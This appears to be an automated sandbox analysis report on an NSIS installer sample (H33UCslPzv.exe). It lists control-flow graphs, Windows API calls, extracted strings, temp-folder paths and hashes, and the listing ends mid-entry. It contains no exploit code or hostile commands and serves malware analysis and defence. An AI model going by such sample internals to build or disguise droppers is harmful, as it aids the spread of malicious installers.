403c9a-403ca0 234->240 235->238 239 403c8f-403c91 235->239 238->216 239->233 243 403ca2-403ca8 call 40140b 240->243 244 403cb7-403cc0 call 40140b 240->244 253 403cae 243->253 244->216 252 403cc2-403ccc 244->252 252->253 253->233 255->256 259 403e90 256->259 260 403e8d-403e8e 256->260 261 403e92-403ec0 GetSystemMenu EnableMenuItem SendMessageA 259->261 260->261 262 403ec2-403ed3 SendMessageA 261->262 263 403ed5 261->263 264 403edb-403f15 call 4040b0 call 403b88 call 405fed lstrlenA call 40600f SetWindowTextA call 401389 262->264 263->264 264->204 275 403f1b-403f1d 264->275 275->204 276 403f23-403f27 275->276 277 403f46-403f5a DestroyWindow 276->277 278 403f29-403f2f 276->278 277->209 279 403f60-403f8d CreateDialogParamA 277->279 278->203 280 403f35-403f3b 278->280 279->209 282 403f93-403fea call 40407b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 279->282 280->204 281 403f41 280->281 281->203 282->203 287 403fec-403fff ShowWindow call 4040c7 282->287 289 404004 287->289 289->209
                                                                  APIs
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403BE3
                                                                  • ShowWindow.USER32(?), ref: 00403C00
                                                                  • DestroyWindow.USER32 ref: 00403C14
                                                                  • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403C30
                                                                  • GetDlgItem.USER32(?,?), ref: 00403C51
                                                                  • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C65
                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403C6C
                                                                  • GetDlgItem.USER32(?,00000001), ref: 00403D1A
                                                                  • GetDlgItem.USER32(?,00000002), ref: 00403D24
                                                                  • SetClassLongA.USER32(?,000000F2,?), ref: 00403D3E
                                                                  • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D8F
                                                                  • GetDlgItem.USER32(?,00000003), ref: 00403E35
                                                                  • ShowWindow.USER32(00000000,?), ref: 00403E56
                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403E68
                                                                  • EnableWindow.USER32(?,?), ref: 00403E83
                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E99
                                                                  • EnableMenuItem.USER32(00000000), ref: 00403EA0
                                                                  • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403EB8
                                                                  • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403ECB
                                                                  • lstrlenA.KERNEL32(0079F548,?,0079F548,00000000), ref: 00403EF5
                                                                  • SetWindowTextA.USER32(?,0079F548), ref: 00403F04
                                                                  • ShowWindow.USER32(?,0000000A), ref: 00404038
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                  • String ID:
                                                                  • API String ID: 3282139019-0
                                                                  • Opcode ID: 0a30aeb85d531018a1be584246925ac06f9566342ce983b6b2b6379f1775da4d
                                                                  • Instruction ID: b507ef7cb9582abf258fe264cbdb2372651992ce94f69c67437d7eaacc5d437d
                                                                  • Opcode Fuzzy Hash: 0a30aeb85d531018a1be584246925ac06f9566342ce983b6b2b6379f1775da4d
                                                                  • Instruction Fuzzy Hash: 09C1B0B1500204AFDB216F25EE85E2B7AB9EB8630AF00853EF741B11F1CB3D59529B5D

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 290 40380a-403822 call 406385 293 403824-403834 call 405f4b 290->293 294 403836-403867 call 405ed4 290->294 303 40388a-4038b3 call 403acf call 405a73 293->303 299 403869-40387a call 405ed4 294->299 300 40387f-403885 lstrcatA 294->300 299->300 300->303 308 4038b9-4038be 303->308 309 40393a-403942 call 405a73 303->309 308->309 310 4038c0-4038d8 call 405ed4 308->310 315 403950-403975 LoadImageA 309->315 316 403944-40394b call 40600f 309->316 314 4038dd-4038e4 310->314 314->309 317 4038e6-4038e8 314->317 319 4039f6-4039fe call 40140b 315->319 320 403977-4039a7 RegisterClassA 315->320 316->315 321 4038f9-403905 lstrlenA 317->321 322 4038ea-4038f7 call 4059b0 317->322 331 403a00-403a03 319->331 332 403a08-403a13 call 403acf 319->332 323 403ac5 320->323 324 4039ad-4039f1 SystemParametersInfoA CreateWindowExA 320->324 329 403907-403915 lstrcmpiA 321->329 330 40392d-403935 call 405985 call 405fed 321->330 322->321 328 403ac7-403ace 323->328 324->319 329->330 335 403917-403921 GetFileAttributesA 329->335 330->309 331->328 343 403a19-403a33 ShowWindow call 406317 332->343 344 403a9c-403a9d call 4051e6 332->344 338 403923-403925 335->338 339 403927-403928 call 4059cc 335->339 338->330 338->339 339->330 351 403a35-403a3a call 406317 343->351 352 403a3f-403a51 GetClassInfoA 343->352 347 403aa2-403aa4 344->347 349 403aa6-403aac 347->349 350 403abe-403ac0 call 40140b 347->350 349->331 353 403ab2-403ab9 call 40140b 349->353 350->323 351->352 356 403a53-403a63 GetClassInfoA RegisterClassA 352->356 357 403a69-403a8c DialogBoxParamA call 40140b 352->357 353->331 356->357 361 403a91-403a9a call 40375a 357->361 361->328
                                                                  APIs
                                                                    • Part of subcall function 00406385: GetModuleHandleA.KERNEL32(?,?,?,004032BB,0000000A), ref: 00406397
                                                                    • Part of subcall function 00406385: GetProcAddress.KERNEL32(00000000,?), ref: 004063B2
                                                                  • lstrcatA.KERNEL32(1033,0079F548,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F548,00000000,00000002,76F93410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\H33UCslPzv.exe",00000000), ref: 00403885
                                                                  • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\unscorified,1033,0079F548,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F548,00000000,00000002,76F93410), ref: 004038FA
                                                                  • lstrcmpiA.KERNEL32(?,.exe), ref: 0040390D
                                                                  • GetFileAttributesA.KERNEL32(Call), ref: 00403918
                                                                  • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\unscorified), ref: 00403961
                                                                    • Part of subcall function 00405F4B: wsprintfA.USER32 ref: 00405F58
                                                                  • RegisterClassA.USER32(007A26E0), ref: 0040399E
                                                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004039B6
                                                                  • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004039EB
                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403A21
                                                                  • GetClassInfoA.USER32(00000000,RichEdit20A,007A26E0), ref: 00403A4D
                                                                  • GetClassInfoA.USER32(00000000,RichEdit,007A26E0), ref: 00403A5A
                                                                  • RegisterClassA.USER32(007A26E0), ref: 00403A63
                                                                  • DialogBoxParamA.USER32(?,00000000,00403BA7,00000000), ref: 00403A82
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                  • String ID: "C:\Users\user\Desktop\H33UCslPzv.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\unscorified$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$&z
                                                                  • API String ID: 1975747703-1475425850
                                                                  • Opcode ID: ed29314727cc808b10f8cc7e31e3080169c9493618b27ee180dd19afac0b604b
                                                                  • Instruction ID: 79248491ef2bc55f5e0c4717b820805706146ebb855d4f379394f0877404e8f0
                                                                  • Opcode Fuzzy Hash: ed29314727cc808b10f8cc7e31e3080169c9493618b27ee180dd19afac0b604b
                                                                  • Instruction Fuzzy Hash: 6C61C6B0240640BED610AF659D45F3B3A6CD785749F10813FF985B62E2DB7D9D028B2D

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 364 402dc4-402e12 GetTickCount GetModuleFileNameA call 405b86 367 402e14-402e19 364->367 368 402e1e-402e4c call 405fed call 4059cc call 405fed GetFileSize 364->368 369 402ff4-402ff8 367->369 376 402e52 368->376 377 402f37-402f45 call 402d60 368->377 379 402e57-402e6e 376->379 383 402f47-402f4a 377->383 384 402f9a-402f9f 377->384 381 402e70 379->381 382 402e72-402e7b call 4031ea 379->382 381->382 390 402fa1-402fa9 call 402d60 382->390 391 402e81-402e88 382->391 386 402f4c-402f64 call 403200 call 4031ea 383->386 387 402f6e-402f98 GlobalAlloc call 403200 call 402ffb 383->387 384->369 386->384 412 402f66-402f6c 386->412 387->384 411 402fab-402fbc 387->411 390->384 395 402f04-402f08 391->395 396 402e8a-402e9e call 405b41 391->396 400 402f12-402f18 395->400 401 402f0a-402f11 call 402d60 395->401 396->400 415 402ea0-402ea7 396->415 406 402f27-402f2f 400->406 407 402f1a-402f24 call 40643c 400->407 401->400 406->379 410 402f35 406->410 407->406 410->377 416 402fc4-402fc9 411->416 417 402fbe 411->417 412->384 412->387 415->400 419 402ea9-402eb0 415->419 421 402fca-402fd0 416->421 417->416 419->400 420 402eb2-402eb9 419->420 420->400 422 402ebb-402ec2 420->422 421->421 423 402fd2-402fed SetFilePointer call 405b41 421->423 422->400 424 402ec4-402ee4 422->424 427 402ff2 423->427 424->384 426 402eea-402eee 424->426 428 402ef0-402ef4 426->428 429 402ef6-402efe 426->429 427->369 428->410 428->429 429->400 430 402f00-402f02 429->430 430->400
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 00402DD5
                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\H33UCslPzv.exe,00000400), ref: 00402DF1
                                                                    • Part of subcall function 00405B86: GetFileAttributesA.KERNELBASE(00000003,00402E04,C:\Users\user\Desktop\H33UCslPzv.exe,80000000,00000003), ref: 00405B8A
                                                                    • Part of subcall function 00405B86: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BAC
                                                                  • GetFileSize.KERNEL32(00000000,00000000,007AB000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\H33UCslPzv.exe,C:\Users\user\Desktop\H33UCslPzv.exe,80000000,00000003), ref: 00402E3D
                                                                  • GlobalAlloc.KERNELBASE(00000040,00000020), ref: 00402F73
                                                                  Strings
                                                                  • Error launching installer, xrefs: 00402E14
                                                                  • C:\Users\user\Desktop, xrefs: 00402E1F, 00402E24, 00402E2A
                                                                  • Null, xrefs: 00402EBB
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00402DCB
                                                                  • Inst, xrefs: 00402EA9
                                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F9A
                                                                  • C:\Users\user\Desktop\H33UCslPzv.exe, xrefs: 00402DDB, 00402DEA, 00402DFE, 00402E1E
                                                                  • "C:\Users\user\Desktop\H33UCslPzv.exe", xrefs: 00402DC4
                                                                  • soft, xrefs: 00402EB2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                  • String ID: "C:\Users\user\Desktop\H33UCslPzv.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\H33UCslPzv.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                  • API String ID: 2803837635-1509689379
                                                                  • Opcode ID: 94b22126cedc31872e0daff38852294c1b287d6deb9664b33d13f09b0919ceb0
                                                                  • Instruction ID: 59d678f17646e0847602a4e6c91a81595dbc35b8f9b1ca6258d7792959114811
                                                                  • Opcode Fuzzy Hash: 94b22126cedc31872e0daff38852294c1b287d6deb9664b33d13f09b0919ceb0
                                                                  • Instruction Fuzzy Hash: 0F510971900216AFDB109F64CE89B9E7BB8EB55355F10403BF904B62C1C7BC9E81AB5D

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 431 40600f-40601a 432 40601c-40602b 431->432 433 40602d-406043 431->433 432->433 434 406234-406238 433->434 435 406049-406054 433->435 437 406066-406070 434->437 438 40623e-406248 434->438 435->434 436 40605a-406061 435->436 436->434 437->438 439 406076-40607d 437->439 440 406253-406254 438->440 441 40624a-40624e call 405fed 438->441 442 406083-4060b7 439->442 443 406227 439->443 441->440 445 4061d4-4061d7 442->445 446 4060bd-4060c7 442->446 447 406231-406233 443->447 448 406229-40622f 443->448 451 406207-40620a 445->451 452 4061d9-4061dc 445->452 449 4060e1 446->449 450 4060c9-4060cd 446->450 447->434 448->434 458 4060e8-4060ef 449->458 450->449 455 4060cf-4060d3 450->455 453 406218-406225 lstrlenA 451->453 454 40620c-406213 call 40600f 451->454 456 4061ec-4061f8 call 405fed 452->456 457 4061de-4061ea call 405f4b 452->457 453->434 454->453 455->449 460 4060d5-4060d9 455->460 469 4061fd-406203 456->469 457->469 462 4060f1-4060f3 458->462 463 4060f4-4060f6 458->463 460->449 465 4060db-4060df 460->465 462->463 467 4060f8-40611b call 405ed4 463->467 468 40612f-406132 463->468 465->458 480 406121-40612a call 40600f 467->480 481 4061bb-4061bf 467->481 470 406142-406145 468->470 471 406134-406140 GetSystemDirectoryA 468->471 469->453 473 406205 469->473 475 4061b2-4061b4 470->475 476 406147-406155 GetWindowsDirectoryA 470->476 474 4061b6-4061b9 471->474 478 4061cc-4061d2 call 406257 473->478 474->478 474->481 475->474 479 406157-406161 475->479 476->475 478->453 486 406163-406166 479->486 487 40617b-406191 SHGetSpecialFolderLocation 479->487 480->474 481->478 484 4061c1-4061c7 lstrcatA 481->484 484->478 486->487 489 406168-40616f 486->489 490 406193-4061ad SHGetPathFromIDListA CoTaskMemFree 487->490 491 4061af 487->491 492 406177-406179 489->492 490->474 490->491 491->475 492->474 492->487
                                                                  APIs
                                                                  • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 0040613A
                                                                  • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00000000,0040514C,Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00000000), ref: 0040614D
                                                                  • SHGetSpecialFolderLocation.SHELL32(0040514C,76F923A0,?,Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00000000,0040514C,Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00000000), ref: 00406189
                                                                  • SHGetPathFromIDListA.SHELL32(76F923A0,Call), ref: 00406197
                                                                  • CoTaskMemFree.OLE32(76F923A0), ref: 004061A3
                                                                  • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004061C7
                                                                  • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00000000,0040514C,Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00000000,00000000,00798F00,76F923A0), ref: 00406219
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                  • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                  • API String ID: 717251189-3376052695
                                                                  • Opcode ID: 0051370bde1f20c27e8a119ac75029747f87839255994d0d480becf8ae13498a
                                                                  • Instruction ID: d98bd44868bde6ace230f91b8fcf6596fc401970515ead307cdfb18f28ae641c
                                                                  • Opcode Fuzzy Hash: 0051370bde1f20c27e8a119ac75029747f87839255994d0d480becf8ae13498a
                                                                  • Instruction Fuzzy Hash: EE61F471904111AEDF11AF68CC84B7E3BA49B56314F16817FE903BA2D2C73C49A2CB4E

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 562 401759-40177c call 402b2c call 4059f2 567 401786-401798 call 405fed call 405985 lstrcatA 562->567 568 40177e-401784 call 405fed 562->568 574 40179d-4017a3 call 406257 567->574 568->574 578 4017a8-4017ac 574->578 579 4017ae-4017b8 call 4062f0 578->579 580 4017df-4017e2 578->580 588 4017ca-4017dc 579->588 589 4017ba-4017c8 CompareFileTime 579->589 582 4017e4-4017e5 call 405b61 580->582 583 4017ea-401806 call 405b86 580->583 582->583 590 401808-40180b 583->590 591 40187e-4018a7 call 405114 call 402ffb 583->591 588->580 589->588 592 401860-40186a call 405114 590->592 593 40180d-40184f call 405fed * 2 call 40600f call 405fed call 405709 590->593 605 4018a9-4018ad 591->605 606 4018af-4018bb SetFileTime 591->606 603 401873-401879 592->603 593->578 627 401855-401856 593->627 607 4029c1 603->607 605->606 609 4018c1-4018cc CloseHandle 605->609 606->609 611 4029c3-4029c7 607->611 612 4018d2-4018d5 609->612 613 4029b8-4029bb 609->613 615 4018d7-4018e8 call 40600f lstrcatA 612->615 616 4018ea-4018ed call 40600f 612->616 613->607 621 4018f2-402349 615->621 616->621 625 40234e-402353 621->625 626 402349 call 405709 621->626 625->611 626->625 627->603 628 401858-401859 627->628 628->592
                                                                  APIs
                                                                  • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\unscorified\Pacinian,00000000,00000000,00000031), ref: 00401798
                                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\unscorified\Pacinian,00000000,00000000,00000031), ref: 004017C2
                                                                    • Part of subcall function 00405FED: lstrcpynA.KERNEL32(?,?,00000400,0040331A,Frigatoon Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FFA
                                                                    • Part of subcall function 00405114: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00000000,00798F00,76F923A0,?,?,?,?,?,?,?,?,?,00403133,00000000,?), ref: 0040514D
                                                                    • Part of subcall function 00405114: lstrlenA.KERNEL32(00403133,Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00000000,00798F00,76F923A0,?,?,?,?,?,?,?,?,?,00403133,00000000), ref: 0040515D
                                                                    • Part of subcall function 00405114: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00403133,00403133,Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00000000,00798F00,76F923A0), ref: 00405170
                                                                    • Part of subcall function 00405114: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll), ref: 00405182
                                                                    • Part of subcall function 00405114: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A8
                                                                    • Part of subcall function 00405114: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051C2
                                                                    • Part of subcall function 00405114: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051D0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsx6761.tmp$C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll$C:\Users\user\AppData\Local\Temp\unscorified\Pacinian$Call
                                                                  • API String ID: 1941528284-3312956367
                                                                  • Opcode ID: d15347f228c0b4bd8738a051a150b1dc970c713c15b2eeb4a2e68bd68b67128e
                                                                  • Instruction ID: 0c6c4ee3c8c955c352dd186891d8ef18ee81d47802e2f4eda18a4991a1bfe0dc
                                                                  • Opcode Fuzzy Hash: d15347f228c0b4bd8738a051a150b1dc970c713c15b2eeb4a2e68bd68b67128e
                                                                  • Instruction Fuzzy Hash: D841B471900515BACB10BBB5CD46D9F36B9DF45328B20823FF522F20E2D67C8A519A6E

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 629 405114-405129 630 4051df-4051e3 629->630 631 40512f-405141 629->631 632 405143-405147 call 40600f 631->632 633 40514c-405158 lstrlenA 631->633 632->633 635 405175-405179 633->635 636 40515a-40516a lstrlenA 633->636 638 405188-40518c 635->638 639 40517b-405182 SetWindowTextA 635->639 636->630 637 40516c-405170 lstrcatA 636->637 637->635 640 4051d2-4051d4 638->640 641 40518e-4051d0 SendMessageA * 3 638->641 639->638 640->630 642 4051d6-4051d9 640->642 641->640 642->630
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00000000,00798F00,76F923A0,?,?,?,?,?,?,?,?,?,00403133,00000000,?), ref: 0040514D
                                                                  • lstrlenA.KERNEL32(00403133,Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00000000,00798F00,76F923A0,?,?,?,?,?,?,?,?,?,00403133,00000000), ref: 0040515D
                                                                  • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00403133,00403133,Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00000000,00798F00,76F923A0), ref: 00405170
